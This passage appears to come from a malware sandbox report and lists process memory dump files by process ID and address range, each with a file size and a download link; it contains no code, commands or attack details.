memory/296-104-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/296-106-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/296-96-0x0000000000000000-mapping.dmp

Download
memory/296-108-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/296-110-0x0000000004D50000-0x0000000005022000-memory.dmp

Filesize
2.8MB

Download
memory/684-66-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/684-63-0x0000000000000000-mapping.dmp

Download
memory/684-74-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/684-115-0x00000000044A0000-0x00000000044D0000-memory.dmp

Filesize
192KB

Download
memory/1212-56-0x0000000000000000-mapping.dmp

Download
memory/1212-59-0x00000000023E1000-0x00000000023E2000-memory.dmp

Filesize
4KB

Download
memory/1212-61-0x0000000004B40000-0x0000000005191000-memory.dmp

Filesize
6.3MB

Download
memory/1212-60-0x00000000023E2000-0x00000000023E4000-memory.dmp

Filesize
8KB

Download
memory/1212-58-0x00000000023E0000-0x00000000023E1000-memory.dmp

Filesize
4KB

Download
memory/1316-53-0x00000000700C1000-0x00000000700C3000-memory.dmp

Filesize
8KB

Download
memory/1316-55-0x0000000075911000-0x0000000075913000-memory.dmp

Filesize
8KB

Download
memory/1316-52-0x0000000072641000-0x0000000072644000-memory.dmp

Filesize
12KB

Download
memory/1316-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1612-97-0x0000000000000000-mapping.dmp

Download
memory/1632-121-0x00000000004010B8-mapping.dmp

Download
memory/1632-120-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1636-79-0x0000000004C40000-0x0000000004F12000-memory.dmp

Filesize
2.8MB

Download
memory/1636-76-0x0000000002310000-0x0000000002F5A000-memory.dmp

Filesize
12.3MB

Download
memory/1636-75-0x0000000002310000-0x0000000002F5A000-memory.dmp

Filesize
12.3MB

Download
memory/1636-68-0x0000000000000000-mapping.dmp

Download
memory/1636-78-0x0000000002310000-0x0000000002F5A000-memory.dmp

Filesize
12.3MB

Download
memory/1748-91-0x0000000004720000-0x0000000004721000-memory.dmp

Filesize
4KB

Download
memory/1748-93-0x0000000002290000-0x00000000022D8000-memory.dmp

Filesize
288KB

Download
memory/1748-82-0x0000000000000000-mapping.dmp

Download
memory/1796-84-0x0000000000000000-mapping.dmp

Download
memory/1796-92-0x0000000004E60000-0x0000000004E61000-memory.dmp

Filesize
4KB

Download
memory/1904-77-0x0000000002370000-0x0000000002FBA000-memory.dmp

Filesize
12.3MB

Download
memory/1904-69-0x0000000000000000-mapping.dmp

Download
memory/1904-80-0x0000000004CA0000-0x0000000004F72000-memory.dmp

Filesize
2.8MB

Download
memory/1980-109-0x0000000002530000-0x000000000317A000-memory.dmp

Filesize
12.3MB

Download
memory/1980-98-0x0000000000000000-mapping.dmp

Download
memory/1980-107-0x0000000002530000-0x000000000317A000-memory.dmp

Filesize
12.3MB

Download
memory/1980-105-0x0000000002530000-0x000000000317A000-memory.dmp

Filesize
12.3MB

Download
memory/1980-111-0x0000000004CF0000-0x0000000004FC2000-memory.dmp

Filesize
2.8MB

Download
memory/2016-113-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

Filesize
8KB

Download
memory/2016-112-0x0000000000000000-mapping.dmp

Download
memory/2020-128-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/2020-129-0x0000000000401364-mapping.dmp

Download
memory/2020-130-0x0000000000630000-0x0000000000783000-memory.dmp

Filesize
1.3MB

Download
memory/2028-133-0x0000000000000000-mapping.dmp

Download